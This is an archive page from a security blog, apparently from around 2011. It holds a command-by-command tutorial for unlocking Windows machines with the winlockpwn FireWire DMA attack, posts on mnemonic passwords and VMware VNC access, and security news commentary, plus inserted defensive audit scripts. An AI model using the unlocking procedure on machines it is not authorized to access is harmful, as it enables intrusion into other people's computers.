Posted by & filed under Hacking & Pentesting, Hacks, Tools & Methodology.

Update: I’ve released a tool on GitHub called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.

Quite regularly I’m asked to demonstrate the FireWire attack created by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]), where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never ceases to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description of how to do it.

Well, sort of. There’s an excellent guide here, but several of the commands no longer work out of the box on Ubuntu, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool has disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)

So here’s how to do the hack on Ubuntu 10.10 (Maverick Meerkat) (the guide originally targeted Ubuntu 11.04 (Natty Narwhal); see the update below):

(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04. I’ll try to figure out how to use the tool with the new FireWire stack (JuJu).)

Get the dependencies

First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:

sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig

Secondly, we need to download and compile Python 2.3:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
cd Python-2.3.6
./configure

Now, since this old Python version contains code that trips gcc’s stack-protector and FORTIFY_SOURCE buffer overflow checks, we have to tell gcc to disable those checks by editing the Makefile. Open the Makefile in your favourite text editor, and change the following line:

BASECFLAGS=      -fno-strict-aliasing

To:

BASECFLAGS=      -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE

Then compile and make an alternative install (altinstall lets the new (old) Python coexist with your existing Python installation instead of replacing it):

make
sudo make altinstall

Fix up the libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

Search for every occurrence of ‘__attribute__ ((deprecated));’, comment it out, and make sure the prototype on the preceding line still ends with a semicolon (the one you just commented out).

Download and install winlockpwn

Since Adam Boileau’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more CSRs (configuration ROM images) and signatures for Windows XP SP3, Vista 32 and 64-bit, Ubuntu 9.04 and Windows 7 32 and 64-bit. Woohoo!

wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.breaknenter.org/files/winlockpwn/winlockpwn
chmod +x ./winlockpwn
vim Makefile (change the Python path from /usr to /usr/local/bin/python2.3)
make

Unload the default Ubuntu FireWire drivers and load your own:

sudo modprobe -r firewire_ohci
sudo modprobe -r firewire_core
sudo modprobe ohci1394
sudo modprobe raw1394

Give write permissions to the firewire device:

sudo chmod 666 /dev/raw1394

Edit the first line of the files romtool, businfo and winlockpwn to reference the Python 2.3 location as installed above, then load the iPod image (or any of the other CSRs) onto the FireWire port:

sudo ./romtool -s 0 ipod.csr

Run businfo to check the port configurations:

sudo ./businfo

Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a FireWire cable, and watch as Windows loads the FireWire drivers, recognizes the iPod and gives it DMA. Finally, run winlockpwn (example parameters below):

sudo ./winlockpwn 0 0 2

You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM CSRs. Also, verify that no FireWire drivers other than the ones loaded above are present by issuing the following commands:

lsmod | grep 1394
lsmod | grep firewire
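The two lsmod checks above cut the other way as well: on a machine you want to protect from this attack, the same module list tells you whether the FireWire stack is even present. The following script is an added example and not part of the original post or the winlockpwn tool; it is a defender-side audit for an Ubuntu box that reports loaded IEEE 1394 modules (both the legacy ohci1394/raw1394 stack and the juju firewire_* stack named above, plus their sbp2/ieee1394 siblings), flags a world-writable /dev/raw1394 like the one the chmod 666 step creates, and prints the modprobe blacklist that stops the modules from loading at all. The function names and the blacklist file name are this example’s own; nothing here touches the bus.

```shell
#!/bin/sh
# Added example (not from the original post): audit a Linux host for the
# FireWire/IEEE 1394 attack surface and print the fix. Module names are the
# ones named in the post plus the sbp2/ieee1394 siblings of both stacks.

FW_MODULES="firewire_core firewire_ohci firewire_sbp2 ohci1394 raw1394 sbp2 ieee1394"

# fw_loaded_modules: read lsmod output on stdin, print the FireWire modules in it.
fw_loaded_modules() {
    awk -v list="$FW_MODULES" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        ($1 in want) { print $1 }'
}

# fw_device_mode_ok MODE: 0 unless the octal mode (e.g. 666) grants write to "other".
fw_device_mode_ok() {
    case "$1" in
        *[2367]) return 1 ;;
        *) return 0 ;;
    esac
}

# fw_blacklist_conf: the /etc/modprobe.d fragment that disables both stacks.
fw_blacklist_conf() {
    for m in $FW_MODULES; do
        printf 'blacklist %s\n' "$m"
    done
}

# fw_audit: run the checks against the live system (lsmod, stat are Ubuntu's GNU tools).
fw_audit() {
    loaded=$(lsmod 2>/dev/null | fw_loaded_modules)
    if [ -n "$loaded" ]; then
        echo "FireWire modules loaded:"
        echo "$loaded" | sed 's/^/  /'
        echo "to disable them, write this to /etc/modprobe.d/blacklist-firewire.conf (assumed file name):"
        fw_blacklist_conf | sed 's/^/  /'
    else
        echo "no FireWire modules loaded"
    fi
    if [ -e /dev/raw1394 ]; then
        mode=$(stat -c %a /dev/raw1394 2>/dev/null)
        fw_device_mode_ok "$mode" || echo "WARNING: /dev/raw1394 is world-writable (mode $mode)"
    fi
}

# Usage: sh fw-audit.sh audit
if [ "${1:-}" = "audit" ]; then
    fw_audit
fi
```

Blacklisting only prevents automatic loading; a root user can still modprobe the modules by hand, which is exactly what the steps above do, so the audit is worth re-running after any driver work.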

Posted by & filed under /dev/random.

A couple of weeks ago I started using the CloudFlare service for Break & Enter, and I’m thrilled about the result. Reduced latency, protection from spammers and bots and my own, shared, cloud-based CDN are just some of the benefits. Highly recommended!

My only hiccup with CloudFlare so far is its inability to serve the WPTouch mobile theme to iPhones and other mobile devices. Not sure who to blame; has anyone else had the same problem?

Posted by & filed under /dev/random.

I’m delighted to be invited/having imposed myself to speak at the Passwords^11 conference in Bergen, Norway next week! I’ll be speaking on June 8 at 09:15 about my master’s thesis and demonstrating how to crack whole-disk encryption on laptops using the coldboot attack. Maybe I’ll throw in some other hardware-based attacks as well. Abstract is on its way.

If you need a good excuse to see the fjords in Norway or just sip some ridiculously expensive beer, here’s your chance: Register now!

Password prompt

Posted by & filed under /dev/random.

How many times a day do you have to type in your passwords? It’s a pesky business remembering all of them, and even though there are many different types of software that can keep track of passwords, you still have to type them in places where the software doesn’t work, like at your laptop logon prompt.

So what’s my take on this? I use personal goals as passwords. Not the goals themselves of course, but most of my passwords are derived from personal goals.

Why? Well, this may seem silly, but if you google “how to achieve your goals” every article seems to agree that you should write your goals down, or otherwise visualize them daily. By using passwords that are derived from real-life challenges and goals, I have to repeat them to myself (not aloud, of course) each time I use them, which is often several times a day. That way, my goals stay in focus, and at the same time, it makes it easier for me to remember the actual password.

This is best illustrated by an example: Let’s say that I have a goal of achieving a CISSP certification by August 2011. I’ll then formulate a sentence (basically a mnemonic) based on this goal, and derive a password from it. For example:

“I’ll succeed at the CISSP exam and gain certification by August 2011”

becomes the password:

I'llsatCe&gcbA11

By swapping certain words for non-alphanumeric characters and capital letters I make sure that the password has the right complexity. By using a long sentence I make sure that the password has a sufficient length, in this case 16 characters.

Cracking this password is hard, even if you know that I use my goals as mnemonics for passwords. If we assume that I’m using all 95 characters in the printable part of the ASCII character set as an alphabet, the password should be strong enough for most applications.
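To make the derivation concrete, here is an added example (not from the original post) that writes the mnemonic rule as a small shell function and does the keyspace arithmetic the paragraph appeals to. The rule set (first letter of each word, contractions such as I’ll kept whole, “and” swapped for “&”, a four-digit year reduced to its last two digits) is this example’s reading of the single sample above; the author’s real substitutions may differ. The function names are this example’s own.

```shell
#!/bin/sh
# Added example (not from the original post): derive a password from a goal
# sentence and compute the 95-character keyspace size for its length.

# mnemonic_password SENTENCE: apply the word-by-word rules and print the result.
mnemonic_password() {
    out=""
    for word in $1; do
        case "$word" in
            and) out="${out}&" ;;                             # "and" becomes an ampersand
            *\'*) out="${out}${word}" ;;                      # contractions such as I'll stay whole
            [0-9][0-9][0-9][0-9]) out="${out}${word#??}" ;;   # 2011 -> 11
            *) out="${out}${word%"${word#?}"}" ;;             # otherwise keep the first character
        esac
    done
    printf '%s' "$out"
}

# password_bits LENGTH ALPHABET: bits of a uniformly random password of that
# length over that alphabet (LENGTH * log2(ALPHABET)), rounded to an integer.
# For a mnemonic-derived password this is only an upper bound.
password_bits() {
    awk -v n="$1" -v a="$2" 'BEGIN { printf "%.0f", n * log(a) / log(2) }'
}

pw=$(mnemonic_password "I'll succeed at the CISSP exam and gain certification by August 2011")
echo "password: $pw (${#pw} characters)"
echo "keyspace upper bound: $(password_bits "${#pw}" 95) bits over 95 printable ASCII characters"
```

The 16-character result gives about 105 bits if every character were chosen uniformly from the 95 printable ASCII characters. The real strength is the unpredictability of the sentence, which is much lower than that bound, since first letters of English words are far from uniform; that gap is the trade-off the author accepts when noting that random passwords are still best.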

But the real treat, as mentioned, is that I force myself to repeat my goals in order to remember the password each time I type it in. That both makes the password easier to remember and, as a side effect, keeps my goals in focus.

Of course, random passwords are still best. But I find this method to be a reasonable trade-off between usability and security.

Now excuse me, I’ll have to go change all my passwords.

Posted by & filed under /dev/random.

I’m speaking about endpoint security and mobility in the upcoming AFSecurity seminar at the University of Oslo 20 May, and I can promise some juicy demonstrations.

From the site:

Academic Forum on Security is a collaborative meeting place in the Oslo area with focus on current issues and research questions related to information security. AFSecurity is organised in collaboration between IfI (Department of Informatics) and FFI (The Defence Research Establishment).

Looking forward to it!

Posted by & filed under Security News.

Several sources reported that the commando team that killed Bin Laden made a perhaps equally important discovery in the Abbottabad residence: data.

Disks, hard drives and computers were seized as a part of the operation, and even though the compound did not have a (wired?) Internet connection or phone lines, the data on these media are, of course, potentially extremely valuable to US intelligence.

al-Qaeda has been known to use encryption before, so it’s not entirely certain that the plethora of digital forensics experts (who are beyond all doubt hammering the disks with all their skills as I write) will come up with anything useful, nor is it certain that the disks contain any useful data at all. Maybe old Osama just fancied playing Minesweeper.

Even if encryption is in use, it’s still a question of what kind of encryption is used, where it is used and how it is used.

  • What kind of encryption: Weak encryption has been used before, and there are plenty of examples of XOR ciphers being touted as “military grade encryption”. A strong encryption scheme uses a scrutinized encryption algorithm (like AES, RSA, Serpent, Twofish, etc.) that is correctly implemented, with a secure key bit length.
  • Where it is utilized: Encryption can be used to protect data, but it is up to the user to select what data he/she wants to protect. You can choose to encrypt files, partitions, disks, whatever contains data. Depending on the selection, copies of sensitive data may reside in unencrypted files, partitions, swap space, other disks or other media.
  • How it is utilized: There are plenty of examples of users choosing bad passwords or otherwise compromising their encryption scheme by using it incorrectly. One prime example is letting a computer that uses Full Disk Encryption (FDE) be seized while it’s powered on or in standby mode, potentially allowing access to the data.

Nevertheless, the weakest link in encryption cases is often the password. Time will show if Bin Laden was as careful with his data as he was with his own physical protection.

Posted by & filed under Security News.

Found an interesting article about the recent RSA hack; it seems that the threat agents in this case were both advanced and persistent. It smells like an intelligence operation to be honest, and it goes to show how hard it is to safeguard against an advanced enemy with the means and stamina to pull off advanced attacks.

To me, the hack looks like a blunt demonstration of hacking prowess. “Look what we can do” is written all over it; showing off that one can break into one of the world’s most prominent security corporations should be sufficient to send shivers down the spines of many government officials.

Posted by & filed under Hacks, Tools & Methodology.

VMware has for a long time shown a blatant disrespect for its Mac customer base by not providing a decent method of accessing Virtual Machines (VMs) from OS X.

The VMware Infrastructure (VI) Client is .NET-based and cannot easily be run from OS X, and the browser plugins do not work with Safari or Firefox (on OS X). There has been a wide range of creative ways of bypassing this ridiculous restriction (among others using another VM as a base for launching the VI client), as well as a public “uproar” to which VMware has decided to turn a deaf ear.

VMware Server and ESXi are great products, but not being able to access my VMs from my MacBook is, to be honest, a huge pain in the *ss. So here’s a simple way of accessing all your VMs’ consoles directly from the Finder in Mac OS X. It will also enable VM access on the iPad/iPhone through VNC apps such as iTeleport. The final result of this tutorial will lead you to a Finder that looks something like this, with all your VMs from your VMware Server/ESXi lined up for easy VNC remote desktop access:

You can then easily connect to all of your virtual machines directly from your Finder/iPad/iPhone! You have access to all the features of the VI client console, including low-level stuff like the BIOS, etc. The guide should work with few modifications for other host and client OSes.

You’ll still need to use the VMware Infrastructure Web Access interface to manage (start/stop/take snapshot/etc.) your VMs. As of March 18th, you can also use the VMware vSphere iPad app to do this.

IMNSHO, this is a much better way of remote access than the hacks mentioned above and elsewhere on the Internet, as it doesn’t involve any client- or server-side virtualization. In other words, you don’t need to buy VMware Fusion or struggle with X11 forwarding over SSH to make it work, and it’s far less resource intensive. It’s also less cumbersome than installing VNC in each VM. Finally, it enables access from all devices that support VNC, which is pretty much any OS out there!

Getting started

The ingredients:

  • VMware Server as the host (the guide should work for ESXi as well, but there you’ll have to configure the VM through the VI client, so a bit of a catch-22); I’ve used Ubuntu as the host system in this guide
  • A Mac with OS X (other OSes should also work, but you’ll need a VNC client) or a mobile device with a VNC client, connected to the same LAN/WLAN as the host
  • An Internet connection
  • The ability to type some commands in the terminal (do not fear, the commands will be provided)

That’s it! Let’s get started.

Enable VNC to the virtual machines

To enable VNC access to a virtual machine, log into your VMware Infrastructure Web Access at:

https://[your ip/hostname]/ui/

Once in, select the machine you want to access from the Inventory, power it off if it’s on, and select Configure VM from the Commands window under the Summary tab.

VMware Web Access - configure VM

Then click Add New Entry, and add the following lines:

  • RemoteDisplay.vnc.enabled = TRUE
  • RemoteDisplay.vnc.port = [port number]
    (The port number can be anything above 1024, but VNC ports are commonly 5901 and upwards. Note: you’ll need to supply a different port number for each VM you want to connect to.)
  • RemoteDisplay.vnc.password = [password]

I strongly suggest using a password. When done, you should have something like this:

Remember the port number (or write it down, for example in the VM notes in the Web Access interface). Click OK.

Now, let’s test the connection with OS X’s built-in VNC client (any other VNC client should work as well). In the Web Access interface, power on the VM.

On your client, open Finder and navigate to /System/Library/CoreServices. You should be able to find an application called Screen Sharing. Open it, and enter your host’s IP address or hostname and the port number you added to the VM configuration using the following syntax:

[ip address/hostname]:[port number]

In my example, this is what it looks like:


Note: It’s important that you connect to your host’s IP/hostname, not your VM’s. VMware Server “forwards” the VNC connection to the VM.

Click Connect, you should be asked for a password (if you set one), enter it, and voila:

Remotely access VM through Screen Sharing

Congratulations! You can now use the VM as a normal remote desktop. But you’re only halfway to total VMware console bliss. Stay tuned to see how you can make all your remote desktops magically appear in your Finder!

Magically turn your Finder into a VMware console (optional)

In order to make the virtual machines turn up in the Finder as pictured above, you’ll need avahi/zeroconf installed on the host. This guide will cover how to install and configure avahi on Ubuntu.

First, install the avahi service:

sudo apt-get install avahi-daemon

Then configure avahi by adding services in /etc/avahi/services. Create a file (one for each virtual machine) and open it:

sudo gedit /etc/avahi/services/win-xp-sp2.service

Paste the following into gedit, replacing the name (Windows XP SP2 in this example) with your VM name and the port (5902 here) with the port number set above:


<DOCTYPE service-group SYSTEM 'avahi-service.dtd'>
<service-group>
<name replace-wildcards='yes'>Windows XP SP2</name>
<service>
<type>_rfb._tcp</type>
<port>5902</port>
</service>
</service-group>

Save and close gedit, and restart avahi:

sudo service avahi-daemon restart

The virtual machine should now magically appear in your Finder if you’re on the same LAN/WLAN as your VMware server. To connect, simply hit Share Screen… in the top right corner of your Finder window.

Congratulations, you can now use your Mac with VMware Server!
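Since you need one service file per VM and a distinct port for each, it is easy to end up with two VMs advertising the same port. The script below is an added example, not part of the original post or of VMware’s or avahi’s own tooling: it reads a list of “VM name:port” lines (a format this example defines), rejects ports at or below 1024 and duplicate ports, writes the avahi service files, and prints the matching RemoteDisplay entries in .vmx syntax (values quoted; the Web Access form takes name and value separately). The password entry is deliberately left to the Web Access UI so it never lands in a shell history. Function names and the default output directory are this example’s own.

```shell
#!/bin/sh
# Added example (not from the original post): generate avahi service files and
# VMware VNC settings for a list of VMs, with port validation.

AVAHI_DIR="${AVAHI_DIR:-/etc/avahi/services}"

# vmware_vnc_entries PORT [KEYMAP]: the VM configuration entries in .vmx syntax.
vmware_vnc_entries() {
    printf 'RemoteDisplay.vnc.enabled = "TRUE"\n'
    printf 'RemoteDisplay.vnc.port = "%s"\n' "$1"
    [ -n "${2:-}" ] && printf 'RemoteDisplay.vnc.keymap = "%s"\n' "$2"
    return 0
}

# avahi_service_xml NAME PORT: service definition advertising a VNC (_rfb._tcp)
# console under NAME, which is what makes it show up in Finder.
avahi_service_xml() {
    cat <<EOF
<?xml version="1.0" standalone='no'?>
<!DOCTYPE service-group SYSTEM "avahi-service.dtd">
<service-group>
  <name replace-wildcards="yes">$1</name>
  <service>
    <type>_rfb._tcp</type>
    <port>$2</port>
  </service>
</service-group>
EOF
}

# vnc_port_ok PORT: 0 if PORT is a number above 1024 and below 65536.
vnc_port_ok() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -gt 1024 ] && [ "$1" -lt 65536 ]
}

# vnc_ports_unique: read "name:port" lines on stdin; 0 if no port is used twice.
vnc_ports_unique() {
    awk -F: '{ if (seen[$NF]++) dup = 1 } END { exit dup ? 1 : 0 }'
}

# service_filename NAME: "Windows XP SP2" -> "windows-xp-sp2"
service_filename() {
    printf '%s' "$1" | tr 'A-Z ' 'a-z-'
}

# write_services: read "name:port" lines on stdin, validate each, write the files
# and print the entries to add through Web Access for that VM.
write_services() {
    while IFS=: read -r name port; do
        vnc_port_ok "$port" || { echo "bad port for '$name': $port" >&2; return 1; }
        avahi_service_xml "$name" "$port" > "$AVAHI_DIR/$(service_filename "$name").service"
        echo "wrote $(service_filename "$name").service; add these entries to '$name' in Web Access:"
        vmware_vnc_entries "$port"
    done
}

# Usage: sudo sh vm-vnc.sh write vms.txt   (then: sudo service avahi-daemon restart)
if [ "${1:-}" = "write" ] && [ -f "${2:-}" ]; then
    vnc_ports_unique < "$2" || { echo "duplicate port in $2" >&2; exit 1; }
    write_services < "$2"
fi
```

Keep in mind that avahi announces these consoles to everyone on the LAN, and the VNC session itself is not encrypted; the password protects the console, not the traffic, which is why this setup belongs on a trusted LAN/WLAN as the ingredients list assumes.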

International only: How to fix keyboard issues

Are you having trouble with the key bindings in VNC? Change your keyboard in OS X to U.S., and set the keyboard to your appropriate model in the virtual machine. This should fix all weird special characters that are unavailable or erroneously mapped.

You’ll have to switch keyboards at the client side each time you switch between working remote and local, though.

Update: In order to enable the right keymapping, add the following line to the VM configuration:

RemoteDisplay.vnc.keymap = "[keymap]"

Swap [keymap] with your appropriate keymap code.

Note to VMware

This guide is entirely unnecessary; I’m sure you easily could have listened to your paying customers and whipped up a VI Client for OS X in no time. Your move.

Posted by & filed under Security News.

I just saw Steve Jobs announce the new iPad (oooh, shiny, want one), and I’m impressed by the numbers he presented in the keynote: > 200 million users are now registered through the App Store. All with associated credit cards.

This is of course nice for Apple, but it also raises some security concerns: 200 million credit cards (or user accounts to the App Store for that matter) is an attractive target for malicious Internet users.

And that’s just the App Store. The slow shift in the computer industry (from Microsoft and other vendors towards Apple) is going to cause some serious threat elevation for Apple products; the Apple malware discovered in the wild recently confirms this. There is also a shift in terms of mobility, which I think increases the risk of directed fire against Apple products even more.

While Apple probably encrypts credit card data in the App Store, I suspect that we’ll see more targeted attacks against Apple infrastructure and products in 2011. I hope someone in Cupertino is re-evaluating their risk assessments and taking security even more seriously, for example by implementing basic security features such as full ASLR in all Apple products ASAP.